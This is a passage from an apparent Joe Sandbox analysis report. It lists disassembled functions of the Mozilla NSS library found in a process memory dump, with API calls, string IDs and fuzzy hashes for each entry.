                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: memset$memcpy$Unlock$AllocateArenaCriticalEnterSectionValuecallocfree
                                                            • String ID:
                                                            • API String ID: 1569127702-0
                                                            • Opcode ID: 101163c8adc260628e2f3e62bdcc928d3dc74d92abe790081d3a1f159720cf30
                                                            • Instruction ID: e4955762cd7e966c3e9518641d09ea250c423d381b72a5d57f89f0c19c3a1ed0
                                                            • Opcode Fuzzy Hash: 101163c8adc260628e2f3e62bdcc928d3dc74d92abe790081d3a1f159720cf30
                                                            • Instruction Fuzzy Hash: 355104B2E042159FEB009F68CC8496EB7B9EF55358B1A412AEC189BF40E731ED85C7D1
                                                            Function 6CA3CE90 Relevance: 22.6, APIs: 15, Instructions: 129COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PK11_DoesMechanism.NSS3(?,00000132), ref: 6CA3CE9E
                                                            • PK11_DoesMechanism.NSS3(?,00000321), ref: 6CA3CEBB
                                                            • PK11_DoesMechanism.NSS3(?,00001081), ref: 6CA3CED8
                                                            • PK11_DoesMechanism.NSS3(?,00000551), ref: 6CA3CEF5
                                                            • PK11_DoesMechanism.NSS3(?,00000651), ref: 6CA3CF12
                                                            • PK11_DoesMechanism.NSS3(?,00000321), ref: 6CA3CF2F
                                                            • PK11_DoesMechanism.NSS3(?,00000121), ref: 6CA3CF4C
                                                            • PK11_DoesMechanism.NSS3(?,00000400), ref: 6CA3CF69
                                                            • PK11_DoesMechanism.NSS3(?,00000341), ref: 6CA3CF86
                                                            • PK11_DoesMechanism.NSS3(?,00000311), ref: 6CA3CFA3
                                                            • PK11_DoesMechanism.NSS3(?,00000301), ref: 6CA3CFBC
                                                            • PK11_DoesMechanism.NSS3(?,00000331), ref: 6CA3CFD5
                                                            • PK11_DoesMechanism.NSS3(?,00000101), ref: 6CA3CFEE
                                                            • PK11_DoesMechanism.NSS3(?,00000141), ref: 6CA3D007
                                                            • PK11_DoesMechanism.NSS3(?,00001008), ref: 6CA3D021
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: DoesK11_Mechanism
                                                            • String ID:
                                                            • API String ID: 622698949-0
                                                            • Opcode ID: c609708ecc05f08e56bb69c1b70e37aefe8df33e1a02ba745add6446eb52fb33
                                                            • Instruction ID: f7a7b1cc82e79ec6305ca6df52de5dcdba8d7b11588d40d7ea82f913d1eab17f
                                                            • Opcode Fuzzy Hash: c609708ecc05f08e56bb69c1b70e37aefe8df33e1a02ba745add6446eb52fb33
                                                            • Instruction Fuzzy Hash: 8E31A771B2292023EF0E04565E31BDE145A4B6670EF881138FD4FE57C0F69997BB42E5
                                                            Function 6C98DC60 Relevance: 21.3, APIs: 9, Strings: 3, Instructions: 282COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memcpy.VCRUNTIME140(?,?,?), ref: 6C98DD56
                                                            • memcpy.VCRUNTIME140(0000FFFE,?,?), ref: 6C98DD7C
                                                            • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6C98DE67
                                                            • memcpy.VCRUNTIME140(0000FFFC,?,?), ref: 6C98DEC4
                                                            • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C98DECD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: memcpy$_byteswap_ulong
                                                            • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                            • API String ID: 2339628231-598938438
                                                            • Opcode ID: 0f9f0982bef2d4a0fd5e3f2e22209f25079d928086eae900b2e5f987528d1cf7
                                                            • Instruction ID: 38ee3818204dc41cbd2df82c3674efe5b356ab66bac5d3a5c201e2d69f753168
                                                            • Opcode Fuzzy Hash: 0f9f0982bef2d4a0fd5e3f2e22209f25079d928086eae900b2e5f987528d1cf7
                                                            • Instruction Fuzzy Hash: 4AA1E6726092529FD710CF29C480A6AB7F9EF95318F158D2EF8898BF41E730E855CB91
                                                            Function 6CA4EDD0 Relevance: 21.2, APIs: 14, Instructions: 239memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PORT_Alloc_Util.NSS3(?), ref: 6CA4EE0B
                                                              • Part of subcall function 6CA60BE0: malloc.MOZGLUE(6CA58D2D,?,00000000,?), ref: 6CA60BF8
                                                              • Part of subcall function 6CA60BE0: TlsGetValue.KERNEL32(6CA58D2D,?,00000000,?), ref: 6CA60C15
                                                            • PR_SetError.NSS3(FFFFE013,00000000), ref: 6CA4EEE1
                                                              • Part of subcall function 6CA41D50: TlsGetValue.KERNEL32(00000000,-00000018), ref: 6CA41D7E
                                                              • Part of subcall function 6CA41D50: EnterCriticalSection.KERNEL32(?), ref: 6CA41D8E
                                                              • Part of subcall function 6CA41D50: PR_Unlock.NSS3(?), ref: 6CA41DD3
                                                            • TlsGetValue.KERNEL32 ref: 6CA4EE51
                                                            • EnterCriticalSection.KERNEL32(?), ref: 6CA4EE65
                                                            • PR_Unlock.NSS3(?), ref: 6CA4EEA2
                                                            • free.MOZGLUE(?), ref: 6CA4EEBB
                                                            • PR_SetError.NSS3(00000000,00000000), ref: 6CA4EED0
                                                            • PR_Unlock.NSS3(?), ref: 6CA4EF48
                                                            • free.MOZGLUE(?), ref: 6CA4EF68
                                                            • PR_SetError.NSS3(00000000,00000000), ref: 6CA4EF7D
                                                            • PK11_DoesMechanism.NSS3(?,?), ref: 6CA4EFA4
                                                            • free.MOZGLUE(?), ref: 6CA4EFDA
                                                            • PR_SetError.NSS3(FFFFE040,00000000), ref: 6CA4F055
                                                            • free.MOZGLUE(?), ref: 6CA4F060
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: Errorfree$UnlockValue$CriticalEnterSection$Alloc_DoesK11_MechanismUtilmalloc
                                                            • String ID:
                                                            • API String ID: 2524771861-0
                                                            • Opcode ID: ff746047a9fbb54e7b4752e15d1b7db20124cf9b6e3816cd948876ef2a8f7c4c
                                                            • Instruction ID: d904009023e7794f2308067b7eccd2bfea892fe2f27fb69baabba2eea7f70e19
                                                            • Opcode Fuzzy Hash: ff746047a9fbb54e7b4752e15d1b7db20124cf9b6e3816cd948876ef2a8f7c4c
                                                            • Instruction Fuzzy Hash: 1E816275A00205AFDF00DFA5DD45EEEBBB5BF48318F584024E909A3711E731E9A8CBA1
                                                            Function 6CA14CF0 Relevance: 21.2, APIs: 14, Instructions: 237memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PK11_SignatureLen.NSS3(?), ref: 6CA14D80
                                                            • PORT_Alloc_Util.NSS3(00000000), ref: 6CA14D95
                                                            • PORT_NewArena_Util.NSS3(00000800), ref: 6CA14DF2
                                                            • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CA14E2C
                                                            • PR_SetError.NSS3(FFFFE028,00000000), ref: 6CA14E43
                                                            • PORT_NewArena_Util.NSS3(00000800), ref: 6CA14E58
                                                            • SGN_CreateDigestInfo_Util.NSS3(00000001,?,?), ref: 6CA14E85
                                                            • DER_Encode_Util.NSS3(?,?,6CB605A4,00000000), ref: 6CA14EA7
                                                            • PK11_SignWithMechanism.NSS3(?,-00000001,00000000,?,?), ref: 6CA14F17
                                                            • DSAU_EncodeDerSigWithLen.NSS3(?,?,?), ref: 6CA14F45
                                                            • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CA14F62
                                                            • PORT_FreeArena_Util.NSS3(?,00000001), ref: 6CA14F7A
                                                            • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CA14F89
                                                            • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CA14FC8
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: Util$Arena_$ErrorFreeItem_K11_WithZfree$Alloc_CreateDigestEncodeEncode_Info_MechanismSignSignature
                                                            • String ID:
                                                            • API String ID: 2843999940-0
                                                            • Opcode ID: 0d3993ebac228e15b2eb0d7ea6ff1f6cb78c8ae896be1d1b8fd1d12795de061d
                                                            • Instruction ID: eb522b3b856c57b34c19f600512acd79782e07c5629cad9d7db460b489eba74c
                                                            • Opcode Fuzzy Hash: 0d3993ebac228e15b2eb0d7ea6ff1f6cb78c8ae896be1d1b8fd1d12795de061d
                                                            • Instruction Fuzzy Hash: EE81A275908301AFE701CF29D940B9BB7E4AB8475CF18852DF958DBB40E731E988CB92
                                                            Function 6CA55C10 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 221COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?), ref: 6CA55C9B
                                                            • PR_SetError.NSS3(FFFFE043,00000000,?,?,?,?,?), ref: 6CA55CF4
                                                            • SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?), ref: 6CA55CFD
                                                            • PR_smprintf.NSS3(tokens=[0x%x=<%s>],00000004,00000000,?,?,?,?,?,?), ref: 6CA55D42
                                                            • free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?), ref: 6CA55D4E
                                                            • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CA55D78
                                                            • PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?), ref: 6CA55E18
                                                            • TlsGetValue.KERNEL32 ref: 6CA55E5E
                                                            • EnterCriticalSection.KERNEL32(?), ref: 6CA55E72
                                                            • PR_Unlock.NSS3(?), ref: 6CA55E8B
                                                              • Part of subcall function 6CA4F820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6CA4F854
                                                              • Part of subcall function 6CA4F820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6CA4F868
                                                              • Part of subcall function 6CA4F820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6CA4F882
                                                              • Part of subcall function 6CA4F820: free.MOZGLUE(04C483FF,?,?), ref: 6CA4F889
                                                              • Part of subcall function 6CA4F820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6CA4F8A4
                                                              • Part of subcall function 6CA4F820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6CA4F8AB
                                                              • Part of subcall function 6CA4F820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6CA4F8C9
                                                              • Part of subcall function 6CA4F820: free.MOZGLUE(280F10EC,?,?), ref: 6CA4F8D0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: free$CriticalSection$Delete$DestroyErrorModule$EnterR_smprintfUnlockValue
                                                            • String ID: d$tokens=[0x%x=<%s>]
                                                            • API String ID: 2028831712-1373489631
                                                            • Opcode ID: 4f439433dd21a552e8c1d859c996ea20424962860b4d6e0ba0f39f36ee3e7a5f
                                                            • Instruction ID: 72913f31f3b97745b58b0a15c335a4b56789817c7b09e7ee24a8cd762e69e947
                                                            • Opcode Fuzzy Hash: 4f439433dd21a552e8c1d859c996ea20424962860b4d6e0ba0f39f36ee3e7a5f
                                                            • Instruction Fuzzy Hash: 307103F1F041019BEB019F25DD4576A3275AF4535CF988035EC0A9BB42EB32E9B9CB92
                                                            Function 6CA46C30 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 58stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6CA4781D,00000000,6CA3BE2C,?,6CA46B1D,?,?,?,?,00000000,00000000,6CA4781D), ref: 6CA46C40
                                                            • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6CA4781D,?,6CA3BE2C,?), ref: 6CA46C58
                                                            • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6CA4781D), ref: 6CA46C6F
                                                            • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6CA46C84
                                                            • PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6CA46C96
                                                              • Part of subcall function 6C9F1240: TlsGetValue.KERNEL32(00000040,?,6C9F116C,NSPR_LOG_MODULES), ref: 6C9F1267
                                                              • Part of subcall function 6C9F1240: EnterCriticalSection.KERNEL32(?,?,?,6C9F116C,NSPR_LOG_MODULES), ref: 6C9F127C
                                                              • Part of subcall function 6C9F1240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C9F116C,NSPR_LOG_MODULES), ref: 6C9F1291
                                                              • Part of subcall function 6C9F1240: PR_Unlock.NSS3(?,?,?,?,6C9F116C,NSPR_LOG_MODULES), ref: 6C9F12A0
                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6CA46CAA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: strncmp$CriticalEnterSectionSecureUnlockValuegetenvstrcmp
                                                            • String ID: NSS_DEFAULT_DB_TYPE$dbm$dbm:$extern:$rdb:$sql:
                                                            • API String ID: 4221828374-3736768024
                                                            • Opcode ID: c4b91682059600ea34b43d622c120a399913b4b5b54c72119140420c59a5fdb6
                                                            • Instruction ID: f6b9b563cad84624856b1d5b8f88de83d35f967d02e9697f22a39d173f4bc139
                                                            • Opcode Fuzzy Hash: c4b91682059600ea34b43d622c120a399913b4b5b54c72119140420c59a5fdb6
                                                            • Instruction Fuzzy Hash: E701F2E170639123FA002BBA2C4AF26361E9F5156EF184432FF08F1A85EBD2E514C0A5
                                                            Function 6C9FACC0 Relevance: 19.6, APIs: 13, Instructions: 150stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: free$Unlock$ErrorValuecallocmallocmemcpystrcpystrlen
                                                            • String ID:
                                                            • API String ID: 786543732-0
                                                            • Opcode ID: d2eb94e8269967de64a027d6b20a31ec12d745c0951510f4bd2130af5deb9f16
                                                            • Instruction ID: 0331ad7ea4f4515cb581edd64732dfd019a265bc5cb81d4b566a9d5e6af2d932
                                                            • Opcode Fuzzy Hash: d2eb94e8269967de64a027d6b20a31ec12d745c0951510f4bd2130af5deb9f16
                                                            • Instruction Fuzzy Hash: 3E51C478E012168BDF00DF59DC456AE7778BF1A348F180025DC25A7B50DB31E956CBE2
                                                            Function 6CA3ADC0 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 110COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PR_LogPrint.NSS3(C_MessageSignInit), ref: 6CA3ADE6
                                                            • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CA3AE17
                                                            • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CA3AE29
                                                              • Part of subcall function 6CB1D930: PL_strncpyz.NSS3(?,?,?), ref: 6CB1D963
                                                            • PR_LogPrint.NSS3(?,00000000), ref: 6CA3AE3F
                                                            • PL_strncpyz.NSS3(?, hKey = 0x%x,00000050), ref: 6CA3AE78
                                                            • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CA3AE8A
                                                            • PR_LogPrint.NSS3(?,00000000), ref: 6CA3AEA0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: L_strncpyzPrint$L_strcatn
                                                            • String ID: hKey = 0x%x$ hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageSignInit
                                                            • API String ID: 332880674-605059067
                                                            • Opcode ID: 99d29f63aa23fc516463ba760ce17896a8187eb231b747b5ad6c7fc4f8e3c248
                                                            • Instruction ID: 2ce412b7bd5a44a5a564408afc216b0389dca797c3dcba3ee4d381c2781aaed8
                                                            • Opcode Fuzzy Hash: 99d29f63aa23fc516463ba760ce17896a8187eb231b747b5ad6c7fc4f8e3c248
                                                            • Instruction Fuzzy Hash: F9312735604174ABDF01CF65EC58FBE377AAB46358F484428E40DDBA81DB389C48CB92
                                                            Function 6CA39EE0 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 110COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PR_LogPrint.NSS3(C_MessageEncryptInit), ref: 6CA39F06
                                                            • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CA39F37
                                                            • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CA39F49
                                                              • Part of subcall function 6CB1D930: PL_strncpyz.NSS3(?,?,?), ref: 6CB1D963
                                                            • PR_LogPrint.NSS3(?,00000000), ref: 6CA39F5F
                                                            • PL_strncpyz.NSS3(?, hKey = 0x%x,00000050), ref: 6CA39F98
                                                            • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CA39FAA
                                                            • PR_LogPrint.NSS3(?,00000000), ref: 6CA39FC0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: L_strncpyzPrint$L_strcatn
                                                            • String ID: hKey = 0x%x$ hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageEncryptInit
                                                            • API String ID: 332880674-1139731676
                                                            • Opcode ID: aa3231266b27d978557cf06fc2c8adddc56216e15b792d58b144b0a37f243753
                                                            • Instruction ID: 5f97e0250a3433df61d9854e94d51984731b65426091af154a1dd42872a420aa
                                                            • Opcode Fuzzy Hash: aa3231266b27d978557cf06fc2c8adddc56216e15b792d58b144b0a37f243753
                                                            • Instruction Fuzzy Hash: 79311A35605264ABDB01DF25ED58FBE3779AB4635CF084028F50DDBA81DF389988CB92
                                                            Function 6CAD4C40 Relevance: 19.3, APIs: 3, Strings: 8, Instructions: 97COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • sqlite3_value_text16.NSS3(?), ref: 6CAD4CAF
                                                            • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6CAD4CFD
                                                            • sqlite3_value_text16.NSS3(?), ref: 6CAD4D44
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: sqlite3_value_text16$sqlite3_log
                                                            • String ID: API call with %s database connection pointer$abort due to ROLLBACK$another row available$bad parameter or other API misuse$invalid$no more rows available$out of memory$unknown error
                                                            • API String ID: 2274617401-4033235608
                                                            • Opcode ID: 10b0654110923d9fa8e1a5f313f191c74e965b4c1266eac0de87e0c908a2cd2d
                                                            • Instruction ID: fa66192be9917c58a8beb86a2ec4a3da3b048f3c0e4000a6f1fd2242139d6ffc
                                                            • Opcode Fuzzy Hash: 10b0654110923d9fa8e1a5f313f191c74e965b4c1266eac0de87e0c908a2cd2d
                                                            • Instruction Fuzzy Hash: AB314673A089A1ABDB084B24B8167E97321B783318F1F0125D8685BF58C721FCE287D2
                                                            Function 6CA32DD0 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 94COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PR_LogPrint.NSS3(C_InitPIN), ref: 6CA32DF6
                                                            • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CA32E24
                                                            • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CA32E33
                                                              • Part of subcall function 6CB1D930: PL_strncpyz.NSS3(?,?,?), ref: 6CB1D963
                                                            • PR_LogPrint.NSS3(?,00000000), ref: 6CA32E49
                                                            • PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6CA32E68
                                                            • PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6CA32E81
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
